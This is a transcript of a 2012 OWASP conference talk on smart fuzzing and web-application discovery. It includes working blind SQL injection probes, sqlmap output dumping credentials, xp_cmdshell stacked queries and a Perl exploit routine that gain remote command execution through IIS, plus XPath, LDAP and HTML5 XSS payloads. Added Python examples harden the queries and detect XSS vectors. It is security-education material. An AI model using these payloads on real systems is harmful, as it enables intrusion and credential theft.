  • One of the major sources of information: WSDL file
1. FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
SHREERAJ SHAH
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon

2. Who Are We?
http://shreeraj.blogspot.com
shreeraj@blueinfy.com
http://www.blueinfy.com
• Founder & Director – Blueinfy Solutions Pvt. Ltd. (Brief) – SecurityExposure.com
• Past experience – Net Square, Chase, IBM & Foundstone
• Interest – Web security research
• Published research
  – Articles / Papers – Securityfocus, O'Reilly, DevX, InformIT etc.
  – Tools – wsScanner, scanweb2.0, AppMap, AppCodeScan, AppPrint etc.
  – Advisories – .Net, Java servers etc.
• Books (Author)
  – Web 2.0 Security – Defending Ajax, RIA and SOA
  – Hacking Web Services
  – Web Hacking

3. Well Known Fact!
• 90% of sites are vulnerable to one or more vulnerabilities.
• Exploitable? – YES!
• Most popular ones are – SQLi & XSS
• SQLi – complete compromise of the application …
• XSS – Control over the browser and exploitation

4. Traditional Fuzzing – Not working
• Enterprise running on the 2.0 wave – Portal
• Technologies & Components – Dojo, Ajax, XML Services, Blog, Widgets
• Scans with tools/products failed
• Security issues and hacks
  – SQL injection over XML
  – Ajax driven XSS
  – Several XSS with the Blog component
  – Several information leaks through JSON fuzzing
  – CSRF on both XML and JS-Array
    » HACKED
    » DEFENSE

5. AppSec – Past, Present … (chart; Source – OWASP)

6. Enterprise Technology Trend
• 2007. Web services would rocket from $1.6 billion in 2004 to $34 billion. [IDC]
• 2008. Web Services or Service-Oriented Architecture (SOA) would surge ahead.
• 2009. Enterprise 2.0 in action and penetrating deeper into the corporate environment
• 2010. Flex/Cloud/API era.
• 2012. Mobile/HTML5 era.
7. Architecture (diagram): Browser (HTML / JS / DOM, Ajax, RIA (Flash), RSS feeds) – Internet – Web 2.0 Start page – Application Infrastructure (Web Services End point, Blog, Database, Authentication). Content sources: Documents, News, Weather, Mails, Bank/Trade.

8. Environment (diagram): Internet – DMZ – Trusted – Internal/Corporate. Web 2.0 and Mobile clients talk SOAP/JSON etc. to Web Servers (static pages only: HTML, HTM etc.), a scripted Web Application Server Engine (dynamic pages: ASP, DHTML, PHP, CGI etc.) and an Integrated Framework (ASP.NET on .Net Framework, J2EE App Server, Web Services, DB etc.).

9. Stack/Logic – Layers (diagram). Client side components (Browser): Mobile – Android, iPhone/Pad, other; HTML5 – Storage, WebSocket, DOM, WebSQL, JS, XHR; Flash/Flex – Storage, AMF; Silverlight – XAML, WCF, .NET. Server side components: Presentation Layer, Business Layer, Data Access Layer, Authentication, Communication etc. Runtime, Platform, Operating System Components.

10. Browser & Mobile – Arch. (diagram). Presentation: Mobile, HTML5 + CSS, Silverlight, Flash, API (Media, Geo etc.) & Messaging, Plug-In. Process & Logic: JavaScript, DOM/Events, Parser/Threads. Storage: WebSQL, Cache. Network & Access: XHR 1 & 2, WebSocket, Plug-in Sockets, Browser Native Network Services. Core Policies: SOP/CORS, Sandbox.

11. Case study – Pageflakes

12. Case study – Pageflakes: Widgets, Web Services

13. FUZZING & DISCOVERY

14. OWASP's Risk Picture (figure)

15. Methodology, Scan and Attacks (diagram). Assets – Footprinting & Discovery – Enumeration & Crawling – Attacks and Scanning (Black); Config Scanning, Code Scanning (White). Defense: Secure Coding, Web Firewall – Secure Assets.

16. Discovery (diagram): JSON, XML, JS-Script, JS-Object, JS-Array

17. Attack & Entry
18. GET/POST

    GET /login.aspx?username=shah HTTP/1.1
    Host: example.com
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-us,en;q=0.5
    Accept-Encoding: gzip,deflate
    Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
    Keep-Alive: 300
    Connection: keep-alive

    POST http://example.com/cgi-bin/search.cgi HTTP/1.1
    Host: example.com
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; rv:1.7.3) Gecko/20040913 Firefox/0.10
    Accept: text/xml, application/xml, application/xhtml+xml, text/html;q=0.9, text/plain;q=0.8, image/png,*/*;q=0.5
    Keep-Alive: 300
    Referer: http://example.com/
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 17

    search=searchtext

19. XML-RPC

    POST /trade-rpc/getquote.rem HTTP/1.0
    TE: deflate,gzip;q=0.3
    Connection: TE, close
    Host: xmlrpc.example.com
    Content-Type: text/xml
    Content-Length: 161

    <?xml version="1.0"?>
    <methodCall>
      <methodName>stocks.getquote</methodName>
      <params>
        <param>
          <value><string>MSFT</string></value>
        </param>
      </params>
    </methodCall>

20. SOAP

    <?xml version="1.0" encoding="utf-8"?>
    <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
                   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
                   xmlns:xsd="http://www.w3.org/2001/XMLSchema">
      <soap:Body>
        <getQuotes xmlns="http://tempuri.org/">
          <compid>MSFT</compid>
        </getQuotes>
      </soap:Body>
    </soap:Envelope>

21. REST

    <?xml version="1.0"?>
    <p:Laptops xmlns:p="http://laptops.example.com"
               xmlns:xl="http://www.w3.org/1999/xlink">
      <Laptop id="0123" xl:href="http://www.parts-depot.com/laptops/0123"/>
      <Laptop id="0348" xl:href="http://www.parts-depot.com/laptops/0348"/>
      <Laptop id="0321" xl:href="http://www.parts-depot.com/laptops/0321"/>
      ...
    </p:Laptops>

22. JSON

    message = {
      from : "john@example.com",
      to : "jerry@example.com",
      subject : "I am fine",
      body : "Long message here",
      showsubject : function(){ document.write(this.subject) }
    };

23. HIDDEN DISCOVERY

24. Ajax driven site

25. Crawling with Ruby/Watir
26. Attacker's approach
• Fuzzing over HTTP
• Injecting faults with various sets of payloads
• Trying to raise an exception
• The exception throws a message back as part of the HTTP response
• Scanning the response for signatures
• If a signature is found, it becomes an interesting entry point for exploitation

27. Challenges
• Technology fingerprinting
• Hidden calls
• Framework integration
• Entry points are multiple
• Traditional fuzzing will not work
• Automated assessment can be a challenge
• Behavioral assessment with artificial intelligence

28. Old Approach
• Forcing SQL errors.
• Ideal for identifying database interfaces!

    http://192.168.7.120/details.asp?id='3
    select * from items where product_id = '3      (query reaching the DB)

29. Error – Now? – forget it
• Premature SQL query termination
• We now have an SQL injection point.

30. Blind SQL Injection
• We have an SQL injection point but it is not throwing any error message back as part of its response. The application is sending a customized error page which does not reveal any signature from which we could deduce a potential SQL flaw.
• Knowing the SQL injection point or loophole in the web application, xp_cmdshell seems to be working. But we can't say whether it is working or not, since it doesn't return any meaningful signature. This is "blind xp_cmdshell".
• The firewall doesn't allow outbound traffic, so we can't do ftp, tftp, ping etc. from the box to the Internet to confirm execution of the command on the target system.
• We don't know the actual path to the webroot, so we can't copy a file to a location that can be accessed over HTTP or HTTPS later to confirm execution of the command.
• If we know the path to the webroot and the directory structure but can't find execute permission on it, we can't copy cmd.exe or any other binary there and execute it over HTTP/HTTPS.
31. Checks…
• AND 1=1
• DBO check
    http://192.168.50.50/details.aspx?id=1+AND+USER_NAME()=dbo
• Wait delay call
    http://192.168.50.50/details.aspx?id=1;waitfor+delay+0:0:10
• (SELECT+ASCII(SUBSTRING((a.loginame),1,1))+FROM+master..sysprocesses+AS+a+WHERE+a.spid+=+@@SPID)=115
• http://www.dvds4less.net/details.aspx?id=1+AND+(SELECT+ASCII(SUBSTRING((a.loginame),1,1))+FROM+master..sysprocesses+AS+a+WHERE+a.spid+=+@@SPID)=114
• http://www.dvds4less.net/details.aspx?id=1+AND+(SELECT+ASCII(SUBSTRING((a.loginame),2,1))+FROM+master..sysprocesses+AS+a+WHERE+a.spid+=+@@SPID)=97

32. Running tools
• SQL Map or Absinthe

    D:\tools\sqlmap>sqlmap.py -b -u http://192.168.50.50/details.aspx?id=1

    sqlmap/0.4 coded by inquis <bernardo.damele@gmail.com> and belch <daniele.bellucci@gmail.com>

    [*] starting at: 18:47:58

    [18:48:00] [WARNING] the remote DMBS is not MySQL
    [18:48:00] [WARNING] the remote DMBS is not PostgreSQL
    remote DBMS: Microsoft SQL Server
    banner:
    ---
    Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86)
    Oct 14 2005 00:33:37
    Copyright (c) 1988-2005 Microsoft Corporation
    Express Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
    ---

    [*] shutting down at: 18:48:14

33. Enumeration…

    D:\tools\sqlmap>sqlmap.py -b -u http://192.168.50.50/details.aspx?id=1 --dbs

    sqlmap/0.4 coded by inquis <bernardo.damele@gmail.com> and belch <daniele.bellucci@gmail.com>

    [*] starting at: 18:53:10

    [18:53:12] [WARNING] the remote DMBS is not MySQL
    [18:53:12] [WARNING] the remote DMBS is not PostgreSQL
    remote DBMS: Microsoft SQL Server
    banner:
    ---
    Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86)
    Oct 14 2005 00:33:37
    Copyright (c) 1988-2005 Microsoft Corporation
    Express Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
    ---
    available databases [9]:
    [*] CmdExec_example
    [*] Dashboard
    [*] catalog
    [*] demotrading
    [*] master
    [*] model
    [*] msdb
    [*] order
    [*] tempdb

    [*] shutting down at: 18:55:07

34. Enumeration…

    D:\tools\sqlmap>sqlmap.py -u http://192.168.50.50/details.aspx?id=1 --tables -Dcatalog

    sqlmap/0.4 coded by inquis <bernardo.damele@gmail.com> and belch <daniele.bellucci@gmail.com>

    [*] starting at: 18:59:21

    [18:59:22] [WARNING] the remote DMBS is not MySQL
    [18:59:22] [WARNING] the remote DMBS is not PostgreSQL
    remote DBMS: Microsoft SQL Server
    Database: catalog
    [3 tables]
    +--------------+
    | auth         |
    | dtproperties |
    | items        |
    +--------------+

35. Enumeration…

    D:\tools\sqlmap>sqlmap.py -u http://192.168.50.50/details.aspx?id=1 --dump -D catalog -T auth

    sqlmap/0.4 coded by inquis <bernardo.damele@gmail.com> and belch <daniele.bellucci@gmail.com>

    [*] starting at: 19:01:27

    [19:01:28] [WARNING] the remote DMBS is not MySQL
    [19:01:28] [WARNING] the remote DMBS is not PostgreSQL
    remote DBMS: Microsoft SQL Server
    Database: catalog
    Table: auth
    [3 entries]
    +--------+------+---------+
    | access | user | pass    |
    +--------+------+---------+
    | 101010 | dbo  | john123 |
    | 110011 |      | great   |
    | 001011 |      | loveit  |
    +--------+------+---------+
36. Blind Exploiting

    ' Reads %windir% and publishes it as the IIS virtual directory "secret" with execute access
    Set WshShell = WScript.CreateObject("WScript.Shell")
    Set ObjExec = WshShell.Exec("cmd.exe /c echo %windir%")
    windir = ObjExec.StdOut.ReadLine()
    Set Root = GetObject("IIS://LocalHost/W3SVC/1/ROOT")
    Set Dir = Root.Create("IIsWebVirtualDir", "secret")
    Dir.Path = windir
    Dir.AccessExecute = True
    Dir.SetInfo

    http://target/details.asp?id=1;exec+master..xp_cmdshell+'echo Set WshShell = WScript.CreateObject("WScript.Shell") > c:\secret.vbs'
    …..
    …..
    …..
    http://target/details.asp?id=1;exec+master..xp_cmdshell+'echo Dir.SetInfo >> c:\secret.vbs'
    http://target/details.asp?id=1;exec+master..xp_cmdshell+cscript+c:\secret.vbs'

37. Get the cmd.exe
• Run commands over HTTP/HTTPS
• http://target/secret/system32/cmd.exe?+/c+set

38. Running…

    sub Exploit {
      my $self = shift;
      my $target_host = $self->GetVar(RHOST);
      my $target_port = $self->GetVar(RPORT);
      my $path = $self->GetVar(RPATH);
      my $vhost = $self->GetVar(VHOST);
      my @url = split(/#/, $path);
      # one stacked xp_cmdshell query per line of the VBScript above
      my @payload = (
        "EXEC+master..xp_cmdshell+echo+Set+WshShell+=+WScript.CreateObject(\"WScript.Shell\")>c:\\secret.vbs",
        "EXEC+master..xp_cmdshell+echo+Set+Root+=+GetObject(\"IIS://LocalHost/W3SVC/1/ROOT\")>>c:\\secret.vbs",
        "EXEC+master..xp_cmdshell+echo+Set+Dir+=+Root.Create(\"IIsWebVirtualDir\",\"secret\")>>c:\\secret.vbs",
        "EXEC+master..xp_cmdshell+echo+Dir.Path+=+\"c:\\winnt\\system32\">>c:\\secret.vbs",
        "EXEC+master..xp_cmdshell+echo+Dir.AccessExecute+=+True>>c:\\secret.vbs",
        "EXEC+master..xp_cmdshell+echo+Dir.SetInfo>>c:\\secret.vbs",
        "EXEC+master..xp_cmdshell+cscript+c:\\secret.vbs"
      );
      $self->PrintLine("[+] Sending SQL injection payload...");
      for (my $count = 0; $count <= 6; $count++)
      ..
39. XPATH injection
• XPATH parsing standard error
• XPATH is a method available for XML parsing
• MS SQL server provides an interface and one can get table content in XML format.
• Once this is fetched one can run XPATH queries and obtain results.
• What if username/password parsing is done using XPATH – XPATH injection

40. XPATH injection

    string fulltext = "";
    string coString = "Provider=SQLOLEDB;Server=(local);database=order;User ID=sa;Password=mypass";
    SqlXmlCommand co = new SqlXmlCommand(coString);
    co.RootTag = "Credential";
    co.CommandType = SqlXmlCommandType.Sql;
    co.CommandText = "SELECT * FROM users for xml Auto";
    XmlReader xr = co.ExecuteXmlReader();
    xr.MoveToContent();
    fulltext = xr.ReadOuterXml();
    XmlDocument doc = new XmlDocument();
    doc.LoadXml(fulltext);
    // user and pass come straight from the request and are concatenated into the predicate
    string credential = "//users[@username=" + user + " and @password=" + pass + "]";
    XmlNodeList xmln = doc.SelectNodes(credential);
    string temp;
    if (xmln.Count > 0)
    {
        // True
    }
    else
    {
        // false
    }

41. XPATH injection

    string credential = "//users[@username=" + user + " and @password=" + pass + "]";

• XPATH parsing can be leveraged by passing the following string: or 1=1 or ='
• This will always be true on the first node and the user can get access as whoever the first user is. Bingo!

42. LDAP Injection
• Resource viewer: http://www.something.com/res.cgi?type=1)(uid=*))
• Notice the injection
• Attacker bypasses the user id check
• (S)he can view all machines now
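Hardened construction for both queries, added here as an example that is not code from the talk: the XPath predicate of slides 40 and 41 built from proper XPath 1.0 string literals (spliced with concat() when a value carries both quote kinds, since XPath has no escape character) and the LDAP filter of slide 42 built with RFC 4515 value escaping. The filter shape (&(type=...)(uid=...)) is an assumption about the resource viewer, unsafe_credential_query() adds the quotes the slide's payload implies, and filter_is_wellformed() is a detection-side check that the injected value fails.

```python
"""Added example (not from the talk): build the XPath credential predicate
of slides 40-41 and the LDAP resource filter of slide 42 so that the
injected values stay data. The filter shape (&(type=...)(uid=...)) is an
assumption about the resource viewer; the slide only shows the URL.
"""


def unsafe_credential_query(user, password):
    """The slide's concatenation (quotes added, as its payload implies)."""
    return "//users[@username='%s' and @password='%s']" % (user, password)


def xpath_literal(value):
    """Wrap a value as an XPath 1.0 string literal.

    XPath 1.0 has no escape character, so a value containing both quote
    kinds has to be spliced with concat(); otherwise use the quote the
    value does not contain.
    """
    if "'" not in value:
        return "'%s'" % value
    if '"' not in value:
        return '"%s"' % value
    parts = value.split("'")
    return "concat(%s)" % ", \"'\", ".join("'%s'" % p for p in parts)


def credential_query(user, password):
    """Hardened form of //users[@username=... and @password=...]."""
    return "//users[@username=%s and @password=%s]" % (
        xpath_literal(user), xpath_literal(password))


# RFC 4515 section 3: these characters must be escaped in assertion values.
_LDAP_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}


def ldap_escape(value):
    """Escape one LDAP filter assertion value."""
    return "".join(_LDAP_ESCAPES.get(ch, ch) for ch in value)


def resource_filter(rtype, uid):
    """Assumed filter behind res.cgi?type=..., restricted to the caller's uid."""
    return "(&(type=%s)(uid=%s))" % (ldap_escape(rtype), ldap_escape(uid))


def filter_is_wellformed(flt):
    """Detection-side check: a filter must be exactly one balanced group.

    The slide's value '1)(uid=*))' closes the group early and leaves
    trailing text, which this rejects; the escaped build passes.
    """
    depth = 0
    for i, ch in enumerate(flt):
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
            if depth < 0 or (depth == 0 and i != len(flt) - 1):
                return False
    return depth == 0


if __name__ == "__main__":
    payload = "' or 1=1 or ''='"
    print(unsafe_credential_query(payload, "x"))
    print(credential_query(payload, "x"))
    raw = "(&(type=%s)(uid=%s))" % ("1)(uid=*))", "shah")
    print(raw, filter_is_wellformed(raw))
    safe = resource_filter("1)(uid=*))", "shah")
    print(safe, filter_is_wellformed(safe))
```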
43. SOAP – INJECTIONS & FUZZING

44. Fetching Calls
• Identifying services layer calls

45. Technology Identification
• Location can be obtained from UDDI as well, if already published.
• WSDL location [ Access Point ]
    http://192.168.11.2/ws/dvds4less.asmx?wsdl
  .asmx – indicates a .Net server from MS

46. SOAP request (SOAP Envelope; callouts: <id> is the input to the method, <getProductInfo> is the method call)

    <?xml version="1.0" encoding="utf-16"?>
    <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
                   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
                   xmlns:xsd="http://www.w3.org/2001/XMLSchema">
      <soap:Body>
        <getProductInfo xmlns="http://tempuri.org/">
          <id>1</id>
        </getProductInfo>
      </soap:Body>
    </soap:Envelope>

47. SOAP response (SOAP Envelope; callouts: <getProductInfoResult> is the output of the method, <getProductInfoResponse> is the method response)

    <?xml version="1.0" encoding="utf-16"?>
    <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
                   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
                   xmlns:xsd="http://www.w3.org/2001/XMLSchema">
      <soap:Body>
        <getProductInfoResponse xmlns="http://tempuri.org/">
          <getProductInfoResult>/(1)Finding Nemo($14.99)/</getProductInfoResult>
        </getProductInfoResponse>
      </soap:Body>
    </soap:Envelope>
48. HTML5 & CLIENT SIDE FUZZING

49. HTML5 – Tags/Attributes/Events
• Tags – media (audio/video), canvas (getImageData), menu, embed, buttons/commands, Form control (keys)
• Attributes – form, submit, autofocus, sandbox, manifest, rel etc.
• Events/Objects – Navigation (_self), Editable content, Drag-Drop APIs, pushState (History) etc.

50. HTML5 – XSS
• Blacklists and filters will get bypassed
• Lots of new signatures and possible ways to execute scripts
• XSS can be injected from tags and events
• New attributes are available for XSS payloads

51. XSS variants
• Media tags
• Examples
  – <video><source onerror="javascript:alert(1)">
  – <video onerror="javascript:alert(1)"><source>

52. XSS variants
• Exploiting autofocus
  – <input autofocus onfocus=alert(1)>
  – <select autofocus onfocus=alert(1)>
  – <textarea autofocus onfocus=alert(1)>
  – <keygen autofocus onfocus=alert(1)>

53. XSS variants
• MathML issues
  – <math href="javascript:alert(1)">CLICKME</math>
  – <math><maction actiontype="statusline#http://Blueinfy.com" xlink:href="javascript:alert(1)">CLICKME</maction></math>

54. XSS variants
• Form & Button etc.
  – <form id="test" /><button form="test" formaction="javascript:alert(1)">test
  – <form><button formaction="javascript:alert(1)">test
• Etc … and more …
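A detector for the vectors on slides 51 to 54, added here as an example that is not code from the talk: it inspects parsed attributes instead of matching strings, so event handlers on media, form and MathML elements, javascript: URLs in formaction and xlink:href, and autofocus paired with onfocus are all reported. naive_filter() is an assumed blacklist of the kind slide 50 says gets bypassed, and SLIDE_VECTORS copies four payloads from the slides.

```python
"""Added example (not from the talk): report the HTML5 XSS vectors of
slides 51-54 by inspecting parsed attributes instead of matching strings.

naive_filter() is an assumed blacklist of the kind the slides say gets
bypassed; SLIDE_VECTORS copies four payloads from the slides.
"""
import re
from html.parser import HTMLParser

# Attributes whose value is a URL and must never carry a javascript: scheme.
URL_ATTRS = {"href", "xlink:href", "src", "action", "formaction", "data", "poster"}
# Browsers ignore leading control characters and tabs/newlines inside "javascript:".
_JS_SCHEME = re.compile(r"^[\s\x00-\x1f]*j\s*a\s*v\s*a\s*s\s*c\s*r\s*i\s*p\s*t\s*:", re.I)

SLIDE_VECTORS = [
    '<video><source onerror="javascript:alert(1)">',
    '<input autofocus onfocus=alert(1)>',
    '<math href="javascript:alert(1)">CLICKME</math>',
    '<form id="test" /><button form="test" formaction="javascript:alert(1)">test',
]


class _VectorFinder(HTMLParser):
    """Collects (tag, attribute, reason) for every dangerous attribute."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # html.parser already lower-cases tag and attribute names
        names = {name for name, _ in attrs}
        for name, value in attrs:
            value = value or ""  # valueless attributes such as autofocus
            if name.startswith("on"):  # any event handler, on any element
                self.findings.append((tag, name, "event handler"))
            elif name in URL_ATTRS and _JS_SCHEME.match(value):
                self.findings.append((tag, name, "javascript: URL"))
        if "autofocus" in names and "onfocus" in names:
            self.findings.append((tag, "autofocus", "fires onfocus without user action"))


def find_vectors(markup):
    """All dangerous attributes in a fragment of untrusted markup."""
    finder = _VectorFinder()
    finder.feed(markup)
    finder.close()
    return finder.findings


def naive_filter(markup):
    """Assumed blacklist: True means the fragment 'looks safe' to it."""
    return re.search(r"<script|onclick|onload|onmouseover", markup, re.I) is None


if __name__ == "__main__":
    for vector in SLIDE_VECTORS:
        print(vector)
        print("  naive filter passes:", naive_filter(vector), "| found:", find_vectors(vector))
```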
55. DOM BASED INJECTIONS

56. DOM with HTML5

57. DOM based XSS – Messaging
• It is a sleeping giant in Ajax applications coupled with Web Messaging
• Root cause
  – DOM is already loaded
  – Application is single page and the DOM remains the same
  – New information coming in needs to be injected using various DOM calls like eval()
  – Information is coming from untrusted sources
  – JSONP usage
  – Web Workers and callbacks

58. AJAX with HTML5 – DOM
• The Ajax function would be making a back-end call
• The back-end would be returning a JSON stream or another format, which gets injected into the DOM
• In some libraries the content type would allow the content to get loaded in the browser directly
• In that case, bypassing DOM processing…

59. APIs …
• A few other HTML5 APIs are interesting from a security standpoint
  – File APIs – allow local file access and can be mixed with ClickJacking and other attacks to gain client files.
  – Drag-Drop APIs – exploiting self XSS and a few other tricks, hijacking cookies …
  – Lots more to explore and defend…

60. CONCLUSION & QUESTIONS
